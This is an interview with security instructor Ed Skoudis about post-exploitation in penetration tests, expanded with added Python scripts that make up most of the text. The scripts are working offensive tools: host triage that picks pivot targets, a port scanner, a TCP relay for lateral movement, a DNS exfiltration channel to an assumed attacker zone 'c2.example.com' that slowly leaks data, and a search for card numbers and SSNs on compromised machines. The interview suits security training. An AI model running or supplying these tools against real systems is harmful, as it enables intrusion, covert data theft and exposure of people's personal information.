We’re very excited to present this Q&A with Ed Skoudis. Skoudis is a major presence in the security world. Here’s just a snippet from his lengthy bio: founder of Counter Hack, sought-after instructor at the SANS Institute, creator of NetWars CyberCity, and winner of the US Army’s Order of Thor Medal.
We focused our questions on some of the essentials of post-exploitation techniques. Skoudis set us straight on definitions and methodologies. His answers also nicely complement our own series on pen-testing basics.
Inside Out Security: Let’s say you’ve entered a target system and installed an APT or RAT …
Ed Skoudis: I’m not sure APT is the proper word here. One doesn’t install an “APT”. An APT is a threat actor, specifically a very skilled one. [See this definition of APT.]
Also, I’d prefer not to install a RAT during a penetration test. There is no need for one in modern pen testing. RATs tend to be too heavyweight and intrusive. Traditional RATs usually provide GUI control of the machine and a bunch of splashy doodads that aren’t required by a penetration tester.
Instead, when compromising a machine, I like to use a light-weight payload, such as a Metasploit Meterpreter or related tool to get some form of shell access.
IOS: OK, so after you’re in, what would be the next four or five steps you’d take?
ES: After gaining a toe-hold on the target machine, I would:
- Determine the privileges I’m running with.
- Determine the machine’s location on the network and its network configuration, including looking at its network interfaces (it might be dual-homed), hostname, IP address, MAC address, ARP cache, and DNS cache. It’s important to look for both IPv4 and IPv6 information from these sources, as many systems support IPv6 in addition to IPv4, and IPv6 tends not to get as much scrutiny from security tools as IPv4, making it a nice avenue of attack.
- Look for the active TCP connections this machine has with other systems, especially interesting protocols such as SMB (for Windows file sharing and domain authentication) or SSH (for secure remote shell).
- Check to see what security tools are installed, including anti-virus, application whitelisting, local firewall, etc.
- See if I can leverage its location on the network and active TCP connections to pivot to another host.
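The checklist above as a runnable triage script, added here as an example (it is not Ed Skoudis's or Counter Hack's code). It runs the platform's own enumeration commands for each step and parses the connection table into peers on SMB, SSH, RDP, WinRM or MSSQL ports, which are the ones that usually point at a pivot path. The command set, the port table and the sample netstat/ss output are assumptions made for the example.

```python
"""Toe-hold triage on a freshly compromised host.

Added example for this page, not Ed Skoudis's or Counter Hack's code. It runs
the platform's own enumeration commands for each step of the checklist and
parses the connection table for peers that point at a pivot path.
The command set, the "interesting port" table and SAMPLE_OUTPUT are assumptions.
"""
import platform
import re
import subprocess

# Assumed table: peers on these ports usually mean a reachable SMB/SSH/RDP/WinRM host
INTERESTING_PORTS = {22: "SSH", 445: "SMB", 1433: "MSSQL", 3389: "RDP", 5985: "WinRM"}

# One command per checklist item; IPv6 shows up in the same output as IPv4
WINDOWS_CMDS = {
    "privileges": "whoami /all",
    "interfaces": "ipconfig /all",
    "arp_cache": "arp -a",
    "dns_cache": "ipconfig /displaydns",
    "routes": "route print",
    "connections": "netstat -an",
    "defenses": "tasklist",
}
LINUX_CMDS = {
    "privileges": "id",
    "interfaces": "ip -o addr",
    "arp_cache": "ip neigh",
    "routes": "ip route; ip -6 route",
    "connections": "ss -tan",
    "defenses": "ps -eo comm",
}

# Matches 10.0.0.5:445, [fe80::1%12]:49801 and ::ffff:10.0.0.7:5985 (bracketed or not)
ADDR_PORT = re.compile(r"^\[?([0-9a-fA-F.:%]+?)\]?:(\d+)$")

# Constructed sample mixing Windows "netstat -an" and Linux "ss -tan" lines
SAMPLE_OUTPUT = """Proto  Local Address          Foreign Address        State
  TCP    10.0.0.4:49700         10.0.0.5:445           ESTABLISHED
  TCP    10.0.0.4:22            10.0.0.9:51022         ESTABLISHED
  TCP    [fe80::1%12]:49801     [fe80::20c:29ff:fe01:2]:3389  ESTABLISHED
  TCP    10.0.0.4:135           0.0.0.0:0              LISTENING
ESTAB 0 0 ::ffff:10.0.0.4:51000 ::ffff:10.0.0.7:5985
"""


def run(cmd, timeout=15):
    """Run one enumeration command through the shell; empty string on failure."""
    try:
        done = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=timeout)
        return done.stdout
    except (OSError, subprocess.SubprocessError):
        return ""


def classify_connections(text):
    """Parse netstat -an / ss -tan output into established peers on interesting ports."""
    peers, seen = [], set()
    for line in text.splitlines():
        tokens = line.split()
        if not any(t in ("ESTAB", "ESTABLISHED") for t in tokens):
            continue
        ends = [m for m in map(ADDR_PORT.match, tokens) if m]
        if len(ends) < 2:
            continue
        local, remote = ends[0], ends[1]
        lport, rport = int(local.group(2)), int(remote.group(2))
        peer = remote.group(1)
        if peer.startswith("::ffff:"):      # IPv4-mapped IPv6 address, report it as IPv4
            peer = peer[7:]
        if rport in INTERESTING_PORTS:      # this host talks to a service over there
            entry = (peer, INTERESTING_PORTS[rport], "outbound")
        elif lport in INTERESTING_PORTS:    # that host talks to a service on this one
            entry = (peer, INTERESTING_PORTS[lport], "inbound")
        else:
            continue
        if entry not in seen:
            seen.add(entry)
            peers.append({"peer": peer, "service": entry[1], "direction": entry[2], "ipv6": ":" in peer})
    return peers


def triage():
    """Collect every checklist item into one dict plus the parsed pivot candidates."""
    cmds = WINDOWS_CMDS if platform.system() == "Windows" else LINUX_CMDS
    report = {name: run(cmd) for name, cmd in cmds.items()}
    report["pivot_candidates"] = classify_connections(report["connections"])
    return report


if __name__ == "__main__":
    report = triage()
    for name, text in report.items():
        if name != "pivot_candidates":
            print(f"== {name} ==\n{text.strip()[:1500]}\n")
    for p in report["pivot_candidates"]:
        print(f"pivot candidate: {p['peer']} ({p['service']}, {p['direction']}, ipv6={p['ipv6']})")
```

Inbound peers matter as much as outbound ones: a workstation holding an SSH or SMB session into the compromised host is likely an administrator's machine. IPv4-mapped addresses (`::ffff:a.b.c.d`) are folded back to IPv4 so they are not mistaken for real IPv6 paths.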
IOS: What are some must-have tools for post-exploitation?
ES: For Windows targets, there are plentiful PowerShell tools for privilege escalation, pillaging, and pivoting. One of the very best suites of these tools is PowerShell Empire, which rolls together some incredible functionality from a variety of other projects.
In addition to PowerShell Empire, Metasploit itself includes dozens of post-exploitation modules useful for dumping hashes, grabbing crypto keys, getting environment information (including security defenses), and much more.
IOS: What are some techniques and tools for working out local network topology?
ES: I prefer to gain as much information from a compromised machine about the network around it as I can before resorting to intrusive (and easily discovered) scanning. That’s why I like to grab ARP cache, DNS cache, and a list of active TCP connections before moving on. That information tells me about other hosts that the currently compromised one knows about. I’ll also grab the routing table, as it may indicate additional routers on the subnet.
After pillaging that local information from a system, I then start probing to look for other targets on the same subnet, as they will likely be more accessible than systems on separate networks. A ping sweep (IPv4) or a ping of a multicast address (IPv6) may turn up additional nearby hosts ripe for picking and which may have identical credentials to the system(s) I’ve currently compromised!
I then typically do small-scale port scans of very interesting ports to me, those associated with protocols where I may find more juicy attack surface, including TCP 21, 22, 23, 25, 80, 443, 445, 6000, and more.
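The small-scale probing step as an added example (not code from the interview). ICMP ping sweeps need raw sockets, so this substitutes TCP connect() probes against the short port list Skoudis quotes; the host list is assumed to come from the ARP cache, DNS cache and connection table harvested earlier, or from a routing-table subnet expanded with a cap so the scan stays small. The port list, the limits and the 10.0.0.0/24 address in the demo are assumptions.

```python
"""Small-scale probing of nearby hosts after the local pillaging is done.

Added example, not from the interview. ICMP ping sweeps need raw sockets, so
this uses TCP connect() probes against the short port list from the interview;
the host list is assumed to come from the ARP cache, DNS cache and connection
table already harvested, or from a routing-table subnet capped to stay quiet.
"""
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor
from itertools import islice

# The "very interesting ports" named in the interview
INTERESTING_PORTS = (21, 22, 23, 25, 80, 443, 445, 6000)


def probe(host, port, timeout=0.5):
    """True if a TCP three-way handshake completes; IPv4 and IPv6 literals alike."""
    try:
        infos = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    except socket.gaierror:
        return False
    for family, stype, proto, _, sockaddr in infos:
        try:
            with socket.socket(family, stype, proto) as s:
                s.settimeout(timeout)
                s.connect(sockaddr)
                return True
        except OSError:
            continue
    return False


def scan(hosts, ports=INTERESTING_PORTS, timeout=0.5, workers=32):
    """Connect-scan hosts x ports; return {host: [open ports]}, hosts with none omitted."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        futures = {(h, p): pool.submit(probe, h, p, timeout) for h in hosts for p in ports}
    results = {}
    for (host, port), fut in futures.items():
        if fut.result():
            results.setdefault(host, []).append(port)
    return {h: sorted(ps) for h, ps in results.items()}


def local_subnet_hosts(cidr, limit=256):
    """Expand a routing-table subnet into candidates, capped so a /16 (or a v6 /64) stays small."""
    net = ipaddress.ip_network(cidr, strict=False)
    return [str(h) for h in islice(net.hosts(), limit)]


def self_check():
    """Offline sanity check: scan one listening and one closed port on loopback."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    open_port = srv.getsockname()[1]
    tmp = socket.socket()
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]   # freshly released port, so it refuses connections
    tmp.close()
    try:
        return scan(["127.0.0.1"], ports=[closed_port, open_port]), open_port
    finally:
        srv.close()


if __name__ == "__main__":
    # Assumed: 10.0.0.0/24 came from the routing table of the compromised host
    hosts = local_subnet_hosts("10.0.0.0/24")
    for host, open_ports in scan(hosts).items():
        print(host, open_ports)
```

A connect scan completes the handshake and so shows up in the target's connection logs; keep the host and port lists short, as the interview advises, rather than sweeping everything.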
IOS: How do you go about moving around the network?
ES: I use a variety of methods for lateral movement, including the pivoting features of Meterpreter; the msfconsole route command and the portfwd command are quite useful.
On systems where Netcat is already installed (most Linuxes), I rely on Netcat relays of various types, including listener-to-client relays, but also client-to-client and listener-to-listener relays.
On Windows targets, I really love the “netsh interface portproxy” feature to forward ports through the machine, especially its ability to listen on a given port on IPv4 and then shoot data out to another port using IPv6. As far as TCP is concerned at Layer 4, it’s a single connection. But, we switch out the underlying Layer 3 protocol (from IPv4 to IPv6) underneath a single TCP connection. It’s beautiful.
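The relay described in the last two answers, as an added example in Python (not Ed Skoudis's code and not a wrapper around netsh or Netcat). It reproduces the effect of a Netcat listener-to-client relay and of `netsh interface portproxy add v4tov6`: a listener on one address accepts a client, opens an outbound connection to the target, and pumps bytes in both directions, so the client sees one TCP stream while the outbound leg can use the other IP version. The loopback addresses, the echo service standing in for the target and the payloads are assumptions.

```python
"""TCP relay that can switch Layer 3 underneath one Layer 4 stream.

Added example, not Ed Skoudis's code. start_relay() listens on an IPv4 or
IPv6 address and, per accepted client, connects out to the target (family
chosen by getaddrinfo, so "::1" gives an IPv6 leg), then copies bytes both
ways. The echo server stands in for a real target; addresses are assumptions.
"""
import socket
import threading


def _pump(src, dst):
    """Copy bytes one way until EOF, then half-close the destination."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle(client, target_host, target_port):
    """Open the outbound leg and pump both directions until both sides hit EOF."""
    try:
        upstream = socket.create_connection((target_host, target_port), timeout=5)
        upstream.settimeout(None)
    except OSError:
        client.close()
        return
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)
    back.join()
    client.close()
    upstream.close()


def start_relay(listen_host, listen_port, target_host, target_port):
    """Start a background relay; return the bound (host, port) so port 0 works."""
    family = socket.AF_INET6 if ":" in listen_host else socket.AF_INET
    srv = socket.socket(family, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_handle, args=(client, target_host, target_port), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[:2]


def start_echo_server(host):
    """Tiny echo service standing in for the real target; returns its (host, port)."""
    family = socket.AF_INET6 if ":" in host else socket.AF_INET
    srv = socket.socket(family, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(16)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[:2]


def send_through(relay_host, relay_port, payload):
    """Client side: send payload via the relay, half-close, read until EOF."""
    with socket.create_connection((relay_host, relay_port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = s.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def ipv6_loopback_available():
    """True if ::1 can be bound, i.e. the v4-in/v6-out demo can run on this box."""
    if not socket.has_ipv6:
        return False
    try:
        with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
            s.bind(("::1", 0))
        return True
    except OSError:
        return False


if __name__ == "__main__":
    # Assumed demo: listen on IPv4 loopback, forward to an IPv6 target when available
    target = start_echo_server("::1" if ipv6_loopback_available() else "127.0.0.1")
    host, port = start_relay("127.0.0.1", 0, *target)
    print(f"relay {host}:{port} -> {target}: {send_through(host, port, b'ping')!r}")
```

Half-closing with `shutdown(SHUT_WR)` rather than closing is what lets a one-shot exchange finish cleanly in both directions; a relay that closes the whole socket on the first EOF drops the reply still in flight.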
IOS: What are some of the ways exfiltration of data can be accomplished without it being detected?
ES: First, encryption. In many organizations, simply sending the data across a TLS connection will get the job done. Still, they may see the large transfer. If I need to be more subtle, I’ll consider moving data across a command-and-control channel over DNS or a related protocol. A slow dribble is far less likely to be detected than a smash-and-grab, but will still demonstrate the business risk a professional pen tester is hired to show.
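The DNS dribble channel as an added example, not code from the interview. Data is chunked into base32 labels within the DNS limits (63 bytes per label, 253 per name), each query carries a sequence number so the receiving authoritative server can reorder and reassemble what arrives, and a pacing helper spaces the queries out. Nothing is sent on the wire here; the zone name `c2.example.com`, the session label, the delay and the sample record are assumptions.

```python
"""Slow-dribble exfiltration over DNS: the encoder and the decoder.

Added example, not from the interview. encode_queries() turns bytes into
query names of the form <seq>.<base32 labels>.<session>.<zone> that respect
DNS length limits; decode_queries() rebuilds the bytes from whatever names
reached the authoritative server, in any order, and reports gaps.
Zone, session label, pacing and SAMPLE_RECORD are assumptions.
"""
import base64
import time

LABEL_MAX = 63      # DNS label limit
NAME_MAX = 253      # DNS name limit
BYTES_PER_LABEL = LABEL_MAX * 5 // 8   # 39 raw bytes become 63 base32 characters

# Constructed sample "record" to smuggle out
SAMPLE_RECORD = b"".join(f"{i:04d},user{i:02d},***-**-{i:04d}\n".encode() for i in range(20))


def _b32(data):
    # lowercase, unpadded: DNS is case-insensitive and '=' is not label-safe
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text):
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_queries(data, zone, session="s1"):
    """Split data into DNS query names, as many 63-char labels per name as fit."""
    tail_len = 5 + 1 + len(session) + 1 + len(zone)        # seq label (<= 5 digits) and dots
    labels_per_query = max(1, (NAME_MAX - tail_len) // (LABEL_MAX + 1))
    bytes_per_query = labels_per_query * BYTES_PER_LABEL
    names = []
    for seq, off in enumerate(range(0, len(data), bytes_per_query)):
        enc = _b32(data[off:off + bytes_per_query])
        labels = [enc[i:i + LABEL_MAX] for i in range(0, len(enc), LABEL_MAX)]
        names.append(".".join([str(seq), *labels, session, zone]))
    return names


def decode_queries(names, zone, session="s1"):
    """Server side: rebuild (data, missing_seqs) from the names seen, in any order."""
    tail = f".{session}.{zone}"
    chunks = {}
    for name in names:
        if not name.lower().endswith(tail.lower()):
            continue                                   # unrelated query at the server
        body = name[:-len(tail)]
        seq, _, labels = body.partition(".")
        chunks[int(seq)] = _unb32(labels.replace(".", ""))
    if not chunks:
        return b"", []
    missing = [i for i in range(max(chunks) + 1) if i not in chunks]
    return b"".join(chunks[i] for i in sorted(chunks)), missing


def dribble(names, resolve, delay_s=2.0):
    """Issue one query per delay_s through resolve(name), e.g. socket.gethostbyname."""
    for name in names:
        try:
            resolve(name)
        except OSError:
            pass                                       # NXDOMAIN is fine, the query was logged
        time.sleep(delay_s)


if __name__ == "__main__":
    zone = "c2.example.com"                            # assumed attacker-controlled zone
    names = encode_queries(SAMPLE_RECORD, zone)
    print(f"{len(SAMPLE_RECORD)} bytes -> {len(names)} queries, first: {names[0]}")
    # dribble(names, socket.gethostbyname) would actually resolve them, one every 2 s
```

The gap list is the operational check: queries dropped by a resolver or a rate limiter leave holes that the client must resend, and the seq label is what makes those holes visible.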
IOS: How does one search for PII and other sensitive content?
ES: Understanding the business use of a compromised machine is a vital step here. What does the machine do, and where does it store its information to do that? This usually gets me in the right direction.
I search using typical file system commands, such as cd, ls, find, grep, and so forth on Linux, and cd, dir, findstr, etc. on Windows. In PowerShell on Windows, we have some additional great features for searching through the file system.
There are specific tools for finding things like social security numbers and credit cards on targets, but I find that they tend to produce a lot of disk access and noise in the target environment, another item that may get a pen tester noticed and perhaps even blocked.
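A low-noise sensitive-data search, added as an example (not Ed Skoudis's code or any specific tool he uses). It validates candidates before reporting them, with the Luhn check for card numbers and the SSA issuance rules for SSNs, reads only text-like files under a size cap, and stops at a hit budget, so the pass costs far less disk access than a full-tree grep. The extension list, the size cap, the budget and the sample text are assumptions.

```python
"""Targeted search for card numbers and SSNs with low-noise file access.

Added example, not from the interview. Candidates are validated (Luhn for
cards, SSA issuance rules for SSNs) to cut false positives, only small
text-like files are read, and the walk stops at a hit budget so the scan
does not hammer the disk. Extensions, caps and SAMPLE_TEXT are assumptions.
"""
import os
import re

# 13-19 digits with optional single spaces or dashes, not glued to other digits
CARD_RE = re.compile(r"(?<![\d-])(?:\d[ -]?){12,18}\d(?![\d-])")
SSN_RE = re.compile(r"(?<!\d)(\d{3})-(\d{2})-(\d{4})(?!\d)")
TEXT_EXT = {".txt", ".csv", ".log", ".xml", ".json", ".sql", ".ini", ".conf", ".cfg", ".md"}

# Constructed sample: one real-looking card, one that fails Luhn, one valid and
# one impossible SSN, and a timestamp that is digit-heavy but not a card
SAMPLE_TEXT = (
    "card 4111 1111 1111 1111 ok; bad 4111111111111112; "
    "ssn 123-45-6789; bogus 000-12-3456; ts 20240101123045"
)


def luhn_ok(digits):
    """Luhn checksum over a digit string (ISO/IEC 7812 card numbers)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def ssn_ok(area, group, serial):
    """SSA rules: area not 000/666/900-999, group not 00, serial not 0000."""
    a, g, s = int(area), int(group), int(serial)
    return a not in (0, 666) and a < 900 and g != 0 and s != 0


def mask(value):
    """Keep only the last four characters for the report."""
    return "*" * (len(value) - 4) + value[-4:]


def scan_text(text):
    """Return validated findings as (kind, value) tuples, cards first."""
    hits = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):
            hits.append(("card", digits))
    for m in SSN_RE.finditer(text):
        if ssn_ok(*m.groups()):
            hits.append(("ssn", m.group()))
    return hits


def scan_tree(root, max_bytes=5_000_000, hit_budget=50):
    """Walk root reading only small text-like files; stop once hit_budget is reached."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if os.path.splitext(fn)[1].lower() not in TEXT_EXT:
                continue
            path = os.path.join(dirpath, fn)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue
            for kind, value in scan_text(text):
                findings.append((path, kind, mask(value)))
                if len(findings) >= hit_budget:
                    return findings
    return findings


if __name__ == "__main__":
    for kind, value in scan_text(SAMPLE_TEXT):
        print(kind, mask(value))
    # scan_tree(r"C:\Users") or scan_tree("/srv") on a real target (assumed paths)
```

Masking in the report is deliberate: a pen test needs to prove the data was reachable, not copy it into the deliverable.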
IOS: Finally, any recent trends you can comment on?
ES: Yes, attacks using PowerShell are really on the rise, and there are some tremendous tools like PowerShell Empire for modeling such attacks in pen tests. Furthermore, attacks against Windows Kerberos are an increasing vector today.
IOS: Thanks Ed!